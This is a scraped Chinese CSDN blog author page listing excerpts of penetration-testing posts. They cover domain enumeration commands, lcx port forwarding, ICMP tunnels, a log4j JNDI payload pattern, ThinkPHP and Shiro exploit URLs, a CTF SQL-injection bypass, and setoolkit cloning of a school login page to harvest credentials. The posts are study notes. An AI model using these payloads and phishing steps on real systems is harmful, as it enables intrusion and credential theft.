自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(77)
  • 资源 (1)
  • 收藏
  • 关注

原创 docker启动关闭删除所有的容器命令

1、启动所有容器docker start $(docker ps -a | awk '{ print $1}' | tail -n +2)2、关闭所有容器docker stop $(docker ps -a | awk '{ print $1}' | tail -n +2)3、删除所有容器docker rm $(docker ps -a | awk '{ print $1}' | tail -n +2)4、删除所有镜像(慎用)docker rmi $(docker ima

2022-05-09 11:26:10 1943

原创 常见的端口与服务

端口号 端口说明 攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门 22 ssh:远程连接 爆破 OpenSSH;28 个退格 23 telnet:远程连接 爆破\嗅探 25 smtp:邮件服务 ...

2022-03-01 16:22:19 795

原创 内网渗透篇

域信息搜集命令1.查询当前环境whoami && ipconfig /all2.查询当前域用户net user /domain3.查询域控net time4.查询域工作组net group /domain5.查询域管理用户net group "domain admins" /domain6.查询有几台域控制器 需要域权限net group "Domain controllers"7.查找域...

2022-02-28 21:09:32 2201

原创 java安全入门(四)——RMI

RMI 定义RMI 是远程⽅法调⽤的简称,能够帮助我们查找并执⾏远程对象的⽅法。通俗地说,远程调⽤就象将⼀个 class 放在A机器上,然后在B机器中调⽤这个 class 的⽅法。 RMI ( Remote Method Invocation ),为远程⽅法调⽤,是允许运⾏在⼀个Java虚拟机的对象 调⽤运⾏在另⼀个Java虚拟机上的对象的⽅法。 这两个虚拟机可以是运⾏在相同计算机上的不同 进程中,也可以是运⾏在⽹络上的不同计算机中。 Java...

2022-02-15 11:15:19 3860

原创 java安全入门(四)——JNDI入门指北

前言log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp}那么,我们就需要研究一下是怎么来的。首先来看rpcRPCRPC即 Remote Procedure Call(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。常见 RPC 技术和框架有: 应用级的服务框架:阿里的 Dubbo/Dubbox、Google

2022-02-14 16:36:12 4657

原创 java安全入门(三)——JDBC反序列化漏洞

对于使用java各种组件的项目,如果所使用的组件本身就存在漏洞,那么大部分实在因为在参数传递的时候收到了污染,而今天介绍的这一种,则是相对于在协议层面上的利用。JDBCJava数据库连接,(Java Database Connectivity,简称JDBC)是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法简单来说,你可以理解为 JDBC是封装好的数据库接口,你可以直接使用java调用该组件的接口,他把数据库的协议封装好了,让你无需对协议

2022-02-12 17:32:58 3728 1

转载 Java安全入门(二)——URLDNS POP链分析

分析该反序列化的入口类是java.util.HashMap,它实现了Serializable接口通过HashMap类的反序列化可以触发DNS查询这是一个内置类无需第三方库即可验证,同时也可以验证无回显时反序列化是否成功POP链总览java.util.HashMap.readObject();java.util.HashMap.putVal();java.util.HashMap.hash();java.net.URL.hashCode();java.net.URLStreamH

2022-02-03 11:20:02 362

原创 Java安全入门(二)——CC链1 分析+详解

背景在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。从Apache CommonsCollections 说起。Apache C...

2022-01-29 20:07:16 13248 7

原创 内网学习——0x07 lcx,netcat 和 socat 的使用

1、lcx 使用 lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap Windows内网端口转发内网失陷主机lcx.exe -slave rhost rport lhost lport公网代理主机lcx.exe -listen lport1 lport2内网失陷主机lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389公网代理主机lcx.exe -listen 4444 5555在建

2022-01-24 18:34:30 603

原创 内网学习——0x06 ICMP 隧道工具使用

1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等pt...

2022-01-23 20:27:44 473

原创 内网学习——0x05 BloodHound 的使用

1、介绍 BloodHound 使用可视化图形显示域环境中的关系,攻击者可以使用 BloodHound 识别高度复杂的攻击路径,防御者可以使用 BloodHound 来识别和防御那些相同的攻击路径。蓝队和红队都可以使用 BloodHound 轻松深入域环境中的权限关系。 BloodHound 通过在域内导出相关信息,在将数据收集后,将其导入Neo4j 数据库中,进行展示分析。因此在安装 BloodHound 时,需要安装 Neo4j 数据库。...

2022-01-23 17:58:55 461

原创 内网学习——0x04 域内信息收集

1、判断是否存在域ipconfig查看网关 IP 地址、DNS 的 IP 地址、域名、本机是否和 DNS 服务器处于同一网段。 ipconfig /all然后,通过反向解析查询命令nslookup 解析域名的 IP 地址,查看是否与 DNS 服务器为同一 IP系统详细信息 systeminfo当前登录域与域用户 net config workstation判断主域net time /domain执行以上命令后,通常有三种情况:存...

2022-01-23 16:31:51 1039

原创 内网学习——0x03 本地工作组信息收集

1、手动收集本地工作组信息查看当前权限whoami本地网络配置信息ipconfig /all操作系统和版本信息(英文版)systeminfo | findstr /B /C:"OS Name" /C:"OS Version"操作系统和版本信息(中文版)systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查看系统体系结构echo %PROCESSOR_ARCHITECTURE%查看系统所有...

2022-01-23 10:37:06 638

原创 内网学习——0x02 PowerShell

1、介绍PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但PowerShell 还能做很多 cmd 不能做的事情。 PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是 .NET 对象。PowerShell 有如下...

2022-01-23 08:34:31 392

原创 内网学习——0x01 内网常见名词解释

1、工作组工作组 Work Group 是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,以方便管理。比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱为了解决这一问题,Windows 9x/NT/2000 引用了“工作组”这个概念,比如一所高校,会分为诸如数学系、中文系之类的,然后数学系的电脑全都列入数学系的工作组中,中文系的电脑全部都列入到中文系 的工作组中……如果你要访问某个系别的资源,就在“网上邻居”.

2022-01-22 14:39:02 449

原创 [CISCN2019 华北赛区 Day2 Web1]Hack World1

启动环境题目地址:BUUCTF在线评测首页提示flag位于flag表的flag字段直接输入;select flag from flag;显示sql注入检测单独输入select关键字没有被过滤,说明过滤了空格使用语句;select(flag)from(flag);因为题目提示flag为uuid,uuid是32位随机字符串,所以需要编写python脚本来获取flag先写出一个核心的语句,判断flag的第一个字符是否ascii码为101...

2022-01-22 10:59:07 1331

原创 Java安全入门(一)

命令执行首先介绍最基本的 java中的命令执行弹出计算器,最常用的poc,就是下面的这条import java.io.IOException;public class calc { public static void main(String[] args) throws IOException { java.lang.Runtime.getRuntime().exec("calc.exe"); }}运行结果:弹出计算器是没有回显的,如果.

2022-01-17 20:05:57 3592

原创 分享学习文章

信息收集篇1.信息收集一如何对专属SRC进行信息收集信息收集一如何对专属SRC进行信息收集 - FreeBuf网络安全行业门户2.信息收集,我们到底该收集什么?信息收集,我们到底该收集什么? - FreeBuf网络安全行业门户3.温故知新:Web渗透信息收集温故知新:Web渗透信息收集 - FreeBuf网络安全行业门户渗透+漏洞篇1.批量漏洞挖掘思路小结批量漏洞挖掘思路小结 - FreeBuf网络安全行业门户2.干货 | Spring Boot漏

2022-01-15 20:37:58 2559

转载 Spring Boot Vulnerability Exploit Check List

Spring Boot Vulnerability Exploit Check ListSpring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list声明⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责目录 Spring Boot Vulnerability Exploit Check List 零:路由和版本 0x01:路由知识 0x02:

2022-01-15 20:13:20 2549

原创 vulhub漏洞——Apache Shiro 身份验证绕过漏洞 (CVE-2020-1957)

无法访问对管理页面的直接请求,/admin/并将被重定向到登录页面。构造一个恶意请求/xxx/..;/admin/以绕过身份验证检查并访问管理页面。

2022-01-14 10:40:10 2579

原创 python爬虫-爬取github博客文章并存储为PDF

目标页面:Tags - yanmie's blog我们需要用到的库:import pdfkitimport requestsimport parsel相关模块可pip安装分析页面结构大概浏览以下页面,tags页面中包含了所有文章,不存在分页情况,这样就省去一步了。F12打开开发者工具,查看页面源码,我们看到一个标签列表。打开列表中的一个就会发现,该标签下的文章。ctrl + shift +c ,选择 tags 页面中的文章标题 ”使用..

2022-01-01 23:36:46 1724

原创 setoolkit——克隆网站及利用

0. 切换root用户我们先切换到root用户,再去启动工具。密码为登录kali时所使用的密码sudo -i1. setoolkit 启动启动成功2. 选择Social-Engineering Attacks3. 选择Website Attack Vectors4. 选择Credential Harvester Attack Method5.选择Site Cloner6.输入要克隆的网址我要克隆的是我们学校的校园网认证页面...

2021-12-27 17:01:26 4451

原创 vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。漏洞环境

2021-12-20 12:30:35 2919

原创 vulhub漏洞—docker_daemon_api未授权访问漏洞

docker remote apidocker remote api主要的目的是取代命令行界面,docker client和docker daemon通过unix domain socket进行通信.默认情况下,只有本机的root和docker组用户才能操作docker.漏洞成因dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375docker守护进程监听在0.0.0.0,外网可访问没有使用iptable等限制可连接的来源

2021-12-17 19:11:35 1417

原创 vulhub漏洞—php环境XML外部实体注入漏洞(XXE)

PHP环境 XML外部实体注入漏洞(XXE)XXE知识总结环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。vulhub搭建漏洞:github位置:https://github.com/vulhub/vulhub/tree/master/php/php_xxe使用如下命令编译

2021-12-17 16:52:36 1077

原创 vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞

漏洞描述Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。影响范围Apache Solr <= 8.8.1复现过程漏洞环境vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md执行如下命令启动solr 8.8.1:

2021-12-17 15:02:46 467

原创 Apache Log4j代码执行漏洞(CVE-2021-44228)

前言:12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、

2021-12-14 11:22:51 8121

原创 攻防世界Web进阶—unserialize3

题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1启动环境分析代码代码定义了一个类,其中有一个方法 wakeup() , _wakeup()会直接退出,并输出" bad requests " 末尾有" ?code= " 看样子是要构造url来绕过wakeup()这个函数了。当对一个对象序列化时,php就会调用sleep方法(如果存在的话

2021-12-09 23:35:38 388

原创 [安洵杯2019]easy_serialize_php

知识点反序列化字符逃逸(替换后导致字符串变短)题目链接BUUCTF在线评测[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php审计代码启动环境打开题目是一段代码: <?php​$function = @$_GET['f'];​function filter($img){ //fileter过滤函数,将falg,php等过滤为空 $filter_arr = array('php','flag','p...

2021-12-09 23:31:04 3150 2

原创 [0CTF 2016]piapiapia

知识点:信息泄露PHP反序列化字符串逃逸(替换后导致字符串变长)参数传递数组绕过字符串检测题目链接BUUCTF在线评测1.启动环境,一个登录框2.dirsearch扫描先拿dirsearch扫描一遍,第一次什么也没有扫到,全部都是429。加上延时并且调一下线程再扫描一次,这一次我们扫到了压缩文件,但是普通的php文件扫不到~~。<!--more-->3.下载源码审计打开config.php,我们发现了flag继续分析源码,发现三

2021-12-08 23:03:28 1025

原创 vulhub漏洞——ActiveMQ

访问 3128 端口Goby扫描资产

2021-12-07 16:40:34 816

原创 vulhub漏洞——fastjson

我们只知道一个IPnmap扫描端口我们可以看到 8090opsmessagingXary扫描没有发现漏洞访问 8090 端口fastjson反序列化漏洞验证POCDNSLog Platform获取dnslogburp抓包修改数据包POSTContent-Type: application/json{"zeo":{"@type":"java.net.Inet4Address","val":"m7ds09.dnslog.cn"}} //va.

2021-12-05 23:52:52 4316 6

原创 vulhub漏洞—Heartbleed

漏洞描述:心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。Heartbl

2021-12-03 23:11:53 876

原创 vulhub漏洞—weblogic SSRF

文接上回vubhub漏洞—weblogic RCE_ErYao7的博客-CSDN博客一开始只知道一个IP212.129.248.63使用nmap扫描开放的端口经过尝试我们发现 7001 端口是我们的要打的靶机漏洞使用 Xary 扫描xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html漏洞利用...https://blog.csdn.net/weixin_45808483/artic

2021-12-03 16:17:01 945

原创 vulhub漏洞—weblogic RCE

一开始只知道一个IP212.129.248.63使用nmap扫描开放的端口经过尝试我们发现 7001 端口是我们的要打的靶机漏洞使用 Xary 扫描xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html漏洞利用...

2021-12-02 23:55:30 1408

原创 CTFHub技能树 Web进阶详解

PHPBypass disable_functionPHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用有四种绕过 disable_functions 的手法:攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open

2021-12-02 23:26:05 2601

原创 vulhub漏洞—ThinkPHP

/index.php?s=captcha_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=pwd

2021-12-02 13:15:53 515 1

原创 vulhub漏洞—shiro框架

记录一些学习笔记

2021-12-02 09:38:51 1647

原创 渗透文章分享

温馨提示: 这篇文章是本人阅读学习渗透文章时所写的一些记录与分享。社区分享安全客安全客 - 安全资讯平台先知社区https://xz.aliyun.com/#www.jishu5.com【技术分享】黑盒渗透测试的一些姿势和个人总结【技术分享】黑盒渗透测试的一些姿势和个人总结 - 安全客,安全资讯平台Fuzz漏洞挖掘漫谈 - 博客 - 腾讯安全应急响应中心 (tencent.com)从AFL开始FUZZ之旅从AFL开始FUZZ之旅对着登录框...

2021-11-29 14:42:10 2708

原创 DVWA通关详解

Vulnerability: Brute ForceSecurity level is currently: low.分析源码:没有做身份验证<?php//检查变量是否设置(先看有没有Login参数)if( isset( $_GET[ 'Login' ] ) ) {//获取密码,存入pass变量中 $user = $_GET[ 'username' ];//获取密码 $pass = $_GET[ 'password' ];//将密码使用md5加密 $

2021-11-19 20:52:41 3840

HDFS总结.xmind

HDFS知识点总结(思维导图)XMIND文件

2021-07-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除